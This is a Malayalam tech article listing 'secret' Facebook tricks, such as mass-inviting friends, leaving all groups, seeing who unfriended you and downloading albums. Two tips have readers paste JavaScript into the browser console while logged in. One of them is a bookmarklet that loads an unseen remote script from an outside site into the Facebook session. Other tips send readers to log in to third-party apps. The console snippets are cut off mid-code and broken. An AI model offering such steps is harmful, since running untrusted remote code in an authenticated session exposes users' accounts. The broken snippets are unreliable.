നിങ്ങള്‍ അറിഞ്ഞിരിക്കാത്ത ഫേസ്ബുക്ക് രഹസ്യ ട്രിക്കുകള്‍...!


ഫേസ്ബുക്കാണ് നിങ്ങളുടെ ഇഷ്ട സോഷ്യല്‍ മീഡിയ പ്ലാറ്റ്‌ഫോമെങ്കില്‍, നിങ്ങളുടെ സുഹൃത്തുക്കളില്‍ മികച്ച ധാരണയുണ്ടാക്കാനുളള കുറച്ച് ട്രിക്കുകളാണ് ചുവടെ പറയാന്‍ പോകുന്നത്.

Advertisement

സുഹൃത്തുക്കളെ ചേര്‍ക്കുകയോ, ഡിലിറ്റ് ചെയ്യുകയോ ആണങ്കിലോ, ഏറ്റവും കൂടുതല്‍ ലൈക്കുകള്‍ വാള്‍ അപ്‌ഡേറ്റുകള്‍ക്ക് കിട്ടണമെങ്കിലോ, ആപ്ലിക്കേഷന്‍ പേജുകള്‍ കൂടുതല്‍ ആഴത്തില്‍ മനസ്സിലാക്കണമെങ്കിലോ ഈ ടിപ്‌സുകള്‍ നിങ്ങള്‍ക്ക് വളരെയധികം സഹായകരമായിരിക്കും. ഫേസ്ബുക്ക് സുഹൃത്തുക്കളുടെ മേല്‍ തീര്‍ച്ചയായും നിങ്ങള്‍ക്ക് നിയന്ത്രണവും ആധിപത്യവും ഈ ടിപ്‌സുകള്‍ നിങ്ങള്‍ക്ക് തരുന്നതാണ്.

Advertisement

സ്ലൈഡറിലൂടെ നീങ്ങുക.

1

Trickedouttimeline.com എന്നതില്‍ നിങ്ങളുടെ ചിത്രം അപ്‌ലോഡ് ചെയ്യുക. തുടര്‍ന്ന് ജനറേറ്റ് ചെയ്യപ്പെട്ട ഫേസ്ബുക്ക് ടൈംലൈന്‍ കവര്‍ ഫോട്ടോയും പ്രൊഫൈല്‍ ഫോട്ടോയും ഡൗണ്‍ലോഡ് ചെയ്യുക.

 

2

മൂന്നാം കക്ഷി ആപ്ലിക്കേഷനായ 'Who deleted me' എന്നതിന്റെ വെബ്‌സൈറ്റിലേക്ക് നിങ്ങള്‍ ഫേസ്ബുക്കിലൂടെ ലോഗിന്‍ ചെയ്യുക. നിങ്ങള്‍ക്ക് ആരൊക്കെയാണ് നിങ്ങളെ ഫ്രന്‍ഡ്‌സ് ലിസ്റ്റില്‍ നിന്ന് ഡിലിറ്റ് ചെയ്തതെന്നുളള പട്ടിക ലഭിക്കുന്നതാണ്.

 

3

ഫേസ്ബുക്കിലെ ഇന്‍വൈറ്റ് ഫ്രന്‍ഡ്‌സ് ക്ലിക്ക് ചെയ്യുക. എല്ലാ ഫ്രന്‍ഡുകള്‍ക്കുമായി സ്‌ക്രോള്‍ ഡൗണ്‍ ചെയ്യുക, തുടര്‍ന്ന് ഇന്‍സ്‌പെക്ട് എലിമെന്റ് ഓപണ്‍ ചെയ്യുക (അല്ലെങ്കില്‍ കണ്‍ട്രോള്‍+ഷിഫ്റ്റ്+ജെ അമര്‍ത്തുക) എന്നിട്ട് കണ്‍സോളില്‍ ക്ലിക്ക് ചെയ്യുക. അതിന് ശേഷം താഴെ കൊടുത്തിരിക്കുന്ന ജാവാ സ്‌ക്രിപ്റ്റ് കോപി പേസ്റ്റ് ചെയ്യുക.

For Page :- var inputs = document.getElementsByClassName('uiButton _1sm'); for(var i=0; i
For Events :- javascript:elms=document.getElementsByName('checkableitems[]');for (i=0;i

 

4

നിങ്ങളുടെ ഫേസ്ബുക്ക് പ്രൊഫൈല്‍ ഹോം പേജിന്റെ ഇടത് സൈഡ് ബാറിലായി നിങ്ങള്‍ക്ക് ഗ്രൂപ്‌സ് ക്ലിക്ക് അല്ലെങ്കില്‍ ക്ലിക്ക് ഹിയര്‍ എന്ന ഓപ്ഷന്‍ കാണാവുന്നതാണ്. താഴെ കാണുന്ന ജാവാ സ്‌ക്രിപ്റ്റ് കോപി ചെയ്യുക.

javascript:(function(){document.body.appendChild(document.createElement('script')).src='http://cstricks.webs.com/leave.js';})();

ഈ ജാവാ സ്‌ക്രിപ്റ്റ് ബുക്ക്മാര്‍ക്ക് ചെയ്ത ശേഷം, ആള്‍ ഗ്രൂപ്‌സ് സെക്ഷനിലേക്ക് പോകുക എന്നിട്ട് ബുക്ക്മാര്‍ക്കില്‍ ക്ലിക്ക് ചെയ്യുക. സ്‌റ്റെപ്പുകള്‍ പൂര്‍ത്തിയായി.

 

5

Pick'n'Zip വെബ്‌സൈറ്റിലേക്ക് പോയി നിങ്ങളുടെ ഫേസ്ബുക്ക് അക്കൗണ്ട് ഉപയോഗിച്ച് ലോഗിന്‍ ചെയ്യുക. നിങ്ങള്‍ ഡൗണ്‍ലോഡ് ചെയ്യാന്‍ ആഗ്രഹിക്കുന്ന ആല്‍ബങ്ങള്‍ തിരഞ്ഞെടുക്കുക, തുടര്‍ന്ന് നിര്‍ദേശങ്ങള്‍ പിന്തുടരുക.

 

Best Mobiles in India

English Summary

Facebook Secret Tricks You Possibly Never Knew.